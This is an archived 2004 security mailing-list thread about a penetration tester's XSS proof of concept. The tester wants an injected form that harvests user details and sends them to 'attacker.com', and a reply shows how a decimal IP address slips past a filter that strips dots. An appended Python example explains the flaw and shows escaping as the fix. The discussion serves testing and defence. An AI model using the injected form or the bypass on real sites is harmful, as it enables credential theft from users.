WebApp Sec mailing list archives

RE: Fullstop Substitution in XSS


From: "Pete Foster" <petef () sec-tec co uk>
Date: Tue, 1 Jun 2004 09:02:20 +0100

Hi Calum

You could use a pure decimal for IP address representation.

Use the online tool at:
http://www.opinionatedgeek.com/DotNet/Tools/CrazyIP/Default.aspx

For example the IP address 192.168.0.1 can be represented as 3232235521.

So your HTML FORM code would look like:

<form target="http://3232235521/path/to/script">

Hope this helps.

-- 
Pete



-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: 29 May 2004 05:49
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS


Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum
--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net
http://www.fribble.net
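Added example, not code from either post: a small Python check of why the dot-to-underscore filter Calum describes is not a fix (a decimal IP literal, as in Pete's reply, contains no dot to mangle) beside the correct mitigation, escaping untrusted output. It assumes a placeholder host `attacker.example`, uses the form's `action` attribute (the one that sets the submission URL; the posts wrote `target`), and the "reachable host" heuristic is this example's own.

```python
import html
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the injected form from the original post, with a
# placeholder host. A form's submission URL is its "action" attribute
# (the posts wrote "target").
DOTTED_FORM = '<form action="http://attacker.example/path/to/script">'

def ip_to_decimal(ip: str) -> int:
    """Dotted IPv4 -> single integer, the dotless form the reply suggests."""
    return int(ipaddress.IPv4Address(ip))

def weak_filter(untrusted: str) -> str:
    """The blacklist from the thread: every full stop becomes an underscore."""
    return untrusted.replace(".", "_")

def hardened_output(untrusted: str) -> str:
    """Actual fix: escape untrusted text before emitting it, so '<' becomes
    '&lt;' and the browser never parses a tag at all."""
    return html.escape(untrusted, quote=True)

class _FirstFormHost(HTMLParser):
    """Records the host of the first <form action=...> a browser would parse."""
    host = None

    def handle_starttag(self, tag, attrs):
        if tag == "form" and self.host is None:
            self.host = urlsplit(dict(attrs).get("action") or "").hostname

def reachable_form_host(rendered: str) -> bool:
    """True if a live form in 'rendered' points at a host a browser could reach.
    Heuristic: a public name needs a dot; a bare integer is a legal dotless IPv4."""
    parser = _FirstFormHost()
    parser.feed(rendered)
    host = parser.host
    if host is None:
        return False
    return int(host) <= 0xFFFFFFFF if host.isdigit() else "." in host

def demo() -> dict:
    dotless = f'<form action="http://{ip_to_decimal("192.168.0.1")}/path/to/script">'
    return {
        "weak_dotted": reachable_form_host(weak_filter(DOTTED_FORM)),         # False
        "weak_dotless": reachable_form_host(weak_filter(dotless)),            # True
        "hardened_dotted": reachable_form_host(hardened_output(DOTTED_FORM)), # False
        "hardened_dotless": reachable_form_host(hardened_output(dotless)),    # False
    }
```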




